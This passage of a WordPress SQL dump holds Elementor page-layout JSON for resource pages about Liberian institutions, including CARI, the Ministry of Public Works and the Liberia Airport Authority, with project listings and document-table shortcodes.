6\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"daadead\",\"elType\":\"widget\",\"settings\":{\"title\":\"Related Documents\",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"2e54ec5\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"d6bc921\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}]},\"elements\":[{\"id\":\"70ac5b1\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"0e5b35e\",\"elType\":\"widget\",\"settings\":{\"shortcode\":\"[posts_table post_type=\\\"document\\\" \\ncolumns=\\\"id,title,\\nexcerpt,cf:download_link,\\ntax:resource_category:Categories,\\n\\\" width=\\\"auto,250px,400px,auto,auto,auto\\\" term=\\\"resource_tag:nafaa\\\" page_length=\\\"false\\\"]\"},\"elements\":[],\"widgetType\":\"shortcode\"}],\"isInner\":false}],\"isInner\":false}]'),(8493,1588,'_dp_original','1586'),(8494,1588,'_edit_last','42'),(8496,1590,'_vc_post_settings','s:30:\"a:1:{s:10:\"vc_grid_id\";a:0:{}}\";'),(8497,1590,'slide_template','default'),(8499,1590,'_elementor_template_type','wp-post'),(8500,1590,'_elementor_version','2.7.5'),(8501,1590,'_wp_page_template','default'),(8502,1590,'_elementor_data','[{\"id\":\"7bf16f53\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"df1efc1\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"],\"jet_parallax_layout_fx_direction\":\"fade-in\"}]},\"elements\":[{\"id\":\"76cad43e\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"a1cd518\",\"elType\":\"widget\",\"settings\":{\"editor\":\"National Legislature on Natural Resources Committee coming soon!\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":14,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"9db38fc\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"b4fdbac\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"],\"jet_parallax_layout_fx_direction\":\"fade-in\"}]},\"elements\":[{\"id\":\"571a245f\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"5a94bc\",\"elType\":\"widget\",\"settings\":{\"title\":\"Featured Projects\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Arial\",\"typography_font_size\":{\"unit\":\"px\",\"size\":20,\"sizes\":[]},\"typography_font_weight\":\"100\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"1d96f140\",\"elType\":\"widget\",\"settings\":{\"featured_post\":\"\",\"featured_excerpt_trimmed_ending\":\"...\",\"featured_read_more_text\":\"Read More\",\"posts_columns\":\"3\",\"image_size\":\"full\",\"image_position\":\"top\",\"excerpt_length\":20,\"excerpt_trimmed_ending\":\"...\",\"read_more\":\"yes\",\"read_more_text\":\"Read More\",\"show_meta\":\"\",\"show_terms_tax\":\"resource_tag\",\"use_custom_query\":\"true\",\"custom_query\":\"{\\\"post_type\\\":\\\"project_resource\\\",\\\"order\\\":\\\"ASC\\\",\\\"orderby\\\":\\\"date\\\",\\\"posts_per_page\\\":\\\"3\\\",\\\"tag\\\":\\\"national-legislature\\\",\\\"tag_id\\\":\\\"66\\\",\\\"tax_query\\\":{\\\"0\\\":{\\\"taxonomy\\\":\\\"resource_tag\\\",\\\"field\\\":\\\"slug\\\",\\\"terms\\\":[\\\"national-legislature\\\"],\\\"operator\\\":\\\"IN\\\"},\\\"relation\\\":\\\"OR\\\"}}\",\"post_type\":\"project_resource\",\"all_btn_label\":\"All\",\"title_related_meta\":[{\"meta_label\":\"Label\",\"_id\":\"c0fd7af\",\"meta_key\":\"\",\"meta_format\":\"%s\",\"meta_callback\":\"\",\"date_format\":\"F j, Y\"}],\"content_related_meta\":[{\"meta_label\":\"Label\",\"_id\":\"c9198db\",\"meta_key\":\"\",\"meta_format\":\"%s\",\"meta_callback\":\"\",\"date_format\":\"F j, Y\"}],\"post_title_color\":\"#000000\",\"post_title_typography_typography\":\"custom\",\"post_title_typography_font_weight\":\"600\",\"post_text_color\":\"#7a7a7a\",\"post_text_typography_typography\":\"custom\",\"post_text_typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]},\"post_button_bg_color\":\"#006400\",\"post_button_hover_bg_color\":\"#014421\",\"arrows_style_popover_toggle\":\"custom\"},\"elements\":[],\"widgetType\":\"jet-blog-smart-listing\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"572e4794\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"b4fdbac\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"],\"jet_parallax_layout_fx_direction\":\"fade-in\"}]},\"elements\":[{\"id\":\"65306131\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"30437ac5\",\"elType\":\"widget\",\"settings\":{\"title\":\"Related Documents\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Arial\",\"typography_font_size\":{\"unit\":\"px\",\"size\":20,\"sizes\":[]},\"typography_font_weight\":\"100\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"1bd7b4a2\",\"elType\":\"widget\",\"settings\":{\"shortcode\":\"[posts_table post_type=\\\"document\\\" \\ncolumns=\\\"id,title,\\nexcerpt,cf:download_link,\\ntax:resource_category:Categories,\\n\\\" width=\\\"auto,250px,400px,auto,auto,auto\\\" term=\\\"resource_tag:national-legislature\\\" page_length=\\\"false\\\"]\"},\"elements\":[],\"widgetType\":\"shortcode\"}],\"isInner\":false}],\"isInner\":false}]'),(8504,1590,'_dp_original','1588'),(8505,1590,'_edit_last','42'),(8507,1592,'_vc_post_settings','s:30:\"a:1:{s:10:\"vc_grid_id\";a:0:{}}\";'),(8508,1592,'slide_template','default'),(8510,1592,'_elementor_template_type','wp-post'),(8511,1592,'_elementor_version','2.7.5'),(8512,1592,'_wp_page_template','default'),(8513,1592,'_elementor_data','[{\"id\":\"7bf16f53\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"df1efc1\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"],\"jet_parallax_layout_fx_direction\":\"fade-in\"}]},\"elements\":[{\"id\":\"76cad43e\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"20cbe9f\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>CARI\'s strategy is designed to enhance the its capacity, research and development (R&amp;D) partners to react rapidly to the needs of the stakeholders on knowledge, information and technologies (KIT) required pursuing effective management of natural resources for agriculture and environment in Liberia.<\\/p><p>CARI strategy also provides the focus and guiding principles for achieving a client-oriented and demand-led research for development, with special emphasis on smallholder farmers and entrepreneurs in the agricultural sector.<\\/p>\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":14,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"3d3914\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"b4fdbac\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"],\"jet_parallax_layout_fx_direction\":\"fade-in\"}]},\"elements\":[{\"id\":\"70602b6f\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"237f6997\",\"elType\":\"widget\",\"settings\":{\"title\":\"Featured Projects\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Arial\",\"typography_font_size\":{\"unit\":\"px\",\"size\":20,\"sizes\":[]},\"typography_font_weight\":\"100\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"321f3817\",\"elType\":\"widget\",\"settings\":{\"featured_post\":\"\",\"featured_excerpt_trimmed_ending\":\"...\",\"featured_read_more_text\":\"Read More\",\"posts_columns\":\"3\",\"image_size\":\"full\",\"image_position\":\"top\",\"excerpt_length\":20,\"excerpt_trimmed_ending\":\"...\",\"read_more\":\"yes\",\"read_more_text\":\"Read More\",\"show_meta\":\"\",\"show_terms_tax\":\"resource_tag\",\"use_custom_query\":\"true\",\"custom_query\":\"{\\\"post_type\\\":\\\"project_resource\\\",\\\"order\\\":\\\"ASC\\\",\\\"orderby\\\":\\\"date\\\",\\\"posts_per_page\\\":\\\"3\\\",\\\"tag\\\":\\\"cari\\\",\\\"tag_id\\\":\\\"49\\\",\\\"tax_query\\\":{\\\"0\\\":{\\\"taxonomy\\\":\\\"resource_tag\\\",\\\"field\\\":\\\"slug\\\",\\\"terms\\\":[\\\"cari\\\"],\\\"operator\\\":\\\"IN\\\"},\\\"relation\\\":\\\"OR\\\"}}\",\"post_type\":\"project_resource\",\"all_btn_label\":\"All\",\"title_related_meta\":[{\"meta_label\":\"Label\",\"_id\":\"c0fd7af\",\"meta_key\":\"\",\"meta_format\":\"%s\",\"meta_callback\":\"\",\"date_format\":\"F j, Y\"}],\"content_related_meta\":[{\"meta_label\":\"Label\",\"_id\":\"c9198db\",\"meta_key\":\"\",\"meta_format\":\"%s\",\"meta_callback\":\"\",\"date_format\":\"F j, Y\"}],\"post_title_color\":\"#000000\",\"post_title_typography_typography\":\"custom\",\"post_title_typography_font_weight\":\"600\",\"post_text_color\":\"#7a7a7a\",\"post_text_typography_typography\":\"custom\",\"post_text_typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]},\"post_button_bg_color\":\"#006400\",\"post_button_hover_bg_color\":\"#014421\",\"arrows_style_popover_toggle\":\"custom\"},\"elements\":[],\"widgetType\":\"jet-blog-smart-listing\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"32aca63d\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"b4fdbac\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"],\"jet_parallax_layout_fx_direction\":\"fade-in\"}]},\"elements\":[{\"id\":\"2da625e2\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"76368934\",\"elType\":\"widget\",\"settings\":{\"title\":\"Related Documents\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Arial\",\"typography_font_size\":{\"unit\":\"px\",\"size\":20,\"sizes\":[]},\"typography_font_weight\":\"100\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"5f4d863d\",\"elType\":\"widget\",\"settings\":{\"shortcode\":\"[posts_table post_type=\\\"document\\\" \\ncolumns=\\\"id,title,\\nexcerpt,cf:download_link,\\ntax:resource_category:Categories,\\n\\\" width=\\\"auto,250px,400px,auto,auto,auto\\\" term=\\\"resource_tag:cari\\\" page_length=\\\"false\\\"]\"},\"elements\":[],\"widgetType\":\"shortcode\"}],\"isInner\":false}],\"isInner\":false}]'),(8514,1592,'_dp_original','1590'),(8515,1592,'_edit_last','42'),(8518,1594,'_vc_post_settings','s:30:\"a:1:{s:10:\"vc_grid_id\";a:0:{}}\";'),(8519,1594,'slide_template','default'),(8521,1594,'_elementor_template_type','wp-post'),(8522,1594,'_elementor_version','2.7.5'),(8523,1594,'_wp_page_template','default'),(8524,1594,'_elementor_data','[{\"id\":\"7bf16f53\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"df1efc1\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"],\"jet_parallax_layout_fx_direction\":\"fade-in\"}]},\"elements\":[{\"id\":\"76cad43e\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"2f27869\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>The Department of Public Works was created by an Act of the National Legislature in 1928, and was later changed to the Ministry of Public Works in 1972 to adequately administer the Engineering component of the State in terms of surveying, drafting\\/designing, construction and supervision, to improve and maintain, direct or by contract all highways, bridges, roads, streets, airport, seaport, and all other public infrastructure in the Republic of Liberia.<\\/p><p>The Ministry sole purposes are surveying, drafting and designing construction and supervising construction contracts, and the maintenance of roads, bridges, and public buildings.<\\/p>\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":14,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"321d2cc\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"b4fdbac\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"],\"jet_parallax_layout_fx_direction\":\"fade-in\"}]},\"elements\":[{\"id\":\"a8d61b2\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"5373839\",\"elType\":\"widget\",\"settings\":{\"title\":\"Featured Projects\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Arial\",\"typography_font_size\":{\"unit\":\"px\",\"size\":20,\"sizes\":[]},\"typography_font_weight\":\"100\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"fe27600\",\"elType\":\"widget\",\"settings\":{\"featured_post\":\"\",\"featured_excerpt_trimmed_ending\":\"...\",\"featured_read_more_text\":\"Read More\",\"posts_columns\":\"3\",\"image_size\":\"full\",\"image_position\":\"top\",\"excerpt_length\":20,\"excerpt_trimmed_ending\":\"...\",\"read_more\":\"yes\",\"read_more_text\":\"Read More\",\"show_meta\":\"\",\"show_terms_tax\":\"resource_tag\",\"use_custom_query\":\"true\",\"custom_query\":\"{\\\"post_type\\\":\\\"project_resource\\\",\\\"order\\\":\\\"ASC\\\",\\\"orderby\\\":\\\"date\\\",\\\"posts_per_page\\\":\\\"3\\\",\\\"tag\\\":\\\"mpw\\\",\\\"tag_id\\\":\\\"63\\\",\\\"tax_query\\\":{\\\"0\\\":{\\\"taxonomy\\\":\\\"resource_tag\\\",\\\"field\\\":\\\"slug\\\",\\\"terms\\\":[\\\"mpw\\\"],\\\"operator\\\":\\\"IN\\\"},\\\"relation\\\":\\\"OR\\\"}}\",\"post_type\":\"project_resource\",\"all_btn_label\":\"All\",\"title_related_meta\":[{\"meta_label\":\"Label\",\"_id\":\"c0fd7af\",\"meta_key\":\"\",\"meta_format\":\"%s\",\"meta_callback\":\"\",\"date_format\":\"F j, Y\"}],\"content_related_meta\":[{\"meta_label\":\"Label\",\"_id\":\"c9198db\",\"meta_key\":\"\",\"meta_format\":\"%s\",\"meta_callback\":\"\",\"date_format\":\"F j, Y\"}],\"post_title_color\":\"#000000\",\"post_title_typography_typography\":\"custom\",\"post_title_typography_font_weight\":\"600\",\"post_text_color\":\"#7a7a7a\",\"post_text_typography_typography\":\"custom\",\"post_text_typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]},\"post_button_bg_color\":\"#006400\",\"post_button_hover_bg_color\":\"#014421\",\"arrows_style_popover_toggle\":\"custom\"},\"elements\":[],\"widgetType\":\"jet-blog-smart-listing\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"8c927a2\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"b4fdbac\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"],\"jet_parallax_layout_fx_direction\":\"fade-in\"}]},\"elements\":[{\"id\":\"3e2a906\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"daadead\",\"elType\":\"widget\",\"settings\":{\"title\":\"Related Documents\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Arial\",\"typography_font_size\":{\"unit\":\"px\",\"size\":20,\"sizes\":[]},\"typography_font_weight\":\"100\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"dae3b98\",\"elType\":\"widget\",\"settings\":{\"shortcode\":\"[posts_table post_type=\\\"document\\\" \\ncolumns=\\\"id,title,\\nexcerpt,cf:download_link,\\ntax:resource_category:Categories,\\n\\\" width=\\\"auto,250px,400px,auto,auto,auto\\\" term=\\\"resource_tag:mpw\\\" page_length=\\\"false\\\"]\"},\"elements\":[],\"widgetType\":\"shortcode\"}],\"isInner\":false}],\"isInner\":false}]'),(8526,1594,'_dp_original','1592'),(8527,1594,'_edit_last','38'),(8529,1596,'_vc_post_settings','s:30:\"a:1:{s:10:\"vc_grid_id\";a:0:{}}\";'),(8530,1596,'slide_template','default'),(8532,1596,'_elementor_template_type','wp-post'),(8533,1596,'_elementor_version','2.7.5'),(8534,1596,'_wp_page_template','default'),(8535,1596,'_elementor_data','[{\"id\":\"7bf16f53\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"df1efc1\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"],\"jet_parallax_layout_fx_direction\":\"fade-in\"}]},\"elements\":[{\"id\":\"76cad43e\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"fee7624\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Liberia Airport Authority Information coming up<\\/p>\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":14,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"0cfc190\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"b4fdbac\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"],\"jet_parallax_layout_fx_direction\":\"fade-in\"}]},\"elements\":[{\"id\":\"ef8085e\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"197521f\",\"elType\":\"widget\",\"settings\":{\"title\":\"Featured Projects\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Arial\",\"typography_font_size\":{\"unit\":\"px\",\"size\":20,\"sizes\":[]},\"typography_font_weight\":\"100\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"1214e7c\",\"elType\":\"widget\",\"settings\":{\"featured_post\":\"\",\"featured_excerpt_trimmed_ending\":\"...\",\"featured_read_more_text\":\"Read More\",\"posts_columns\":\"3\",\"image_size\":\"full\",\"image_position\":\"top\",\"excerpt_length\":20,\"excerpt_trimmed_ending\":\"...\",\"read_more\":\"yes\",\"read_more_text\":\"Read More\",\"show_meta\":\"\",\"show_terms_tax\":\"resource_tag\",\"use_custom_query\":\"true\",\"custom_query\":\"{\\\"post_type\\\":\\\"project_resource\\\",\\\"order\\\":\\\"ASC\\\",\\\"orderby\\\":\\\"date\\\",\\\"posts_per_page\\\":\\\"3\\\",\\\"tag\\\":\\\"laa\\\",\\\"tag_id\\\":\\\"55\\\",\\\"tax_query\\\":{\\\"0\\\":{\\\"taxonomy\\\":\\\"resource_tag\\\",\\\"field\\\":\\\"slug\\\",\\\"terms\\\":[\\\"laa\\\"],\\\"operator\\\":\\\"IN\\\"},\\\"relation\\\":\\\"OR\\\"}}\",\"post_type\":\"project_resource\",\"all_btn_label\":\"All\",\"title_related_meta\":[{\"meta_label\":\"Label\",\"_id\":\"c0fd7af\",\"meta_key\":\"\",\"meta_format\":\"%s\",\"meta_callback\":\"\",\"date_format\":\"F j, Y\"}],\"content_related_meta\":[{\"meta_label\":\"Label\",\"_id\":\"c9198db\",\"meta_key\":\"\",\"meta_format\":\"%s\",\"meta_callback\":\"\",\"date_format\":\"F j, Y\"}],\"post_title_color\":\"#000000\",\"post_title_typography_typography\":\"custom\",\"post_title_typography_font_weight\":\"600\",\"post_text_color\":\"#7a7a7a\",\"post_text_typography_typography\":\"custom\",\"post_text_typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]},\"post_button_bg_color\":\"#006400\",\"post_button_hover_bg_color\":\"#014421\",\"arrows_style_popover_toggle\":\"custom\"},\"elements\":[],\"widgetType\":\"jet-blog-smart-listing\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"2241ab5\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"b4fdbac\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"],\"jet_parallax_layout_fx_direction\":\"fade-in\"}]},\"elements\":[{\"id\":\"e6ea64b\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"4015db0\",\"elType\":\"widget\",\"settings\":{\"title\":\"Related Documents\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Arial\",\"typography_font_size\":{\"unit\":\"px\",\"size\":20,\"sizes\":[]},\"typography_font_weight\":\"100\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"3742cd2\",\"elType\":\"widget\",\"settings\":{\"shortcode\":\"[posts_table post_type=\\\"document\\\" \\ncolumns=\\\"id,title,\\nexcerpt,cf:download_link,\\ntax:resource_category:Categories,\\n\\\" width=\\\"auto,250px,400px,auto,auto,auto\\\" term=\\\"resource_tag:laa\\\" 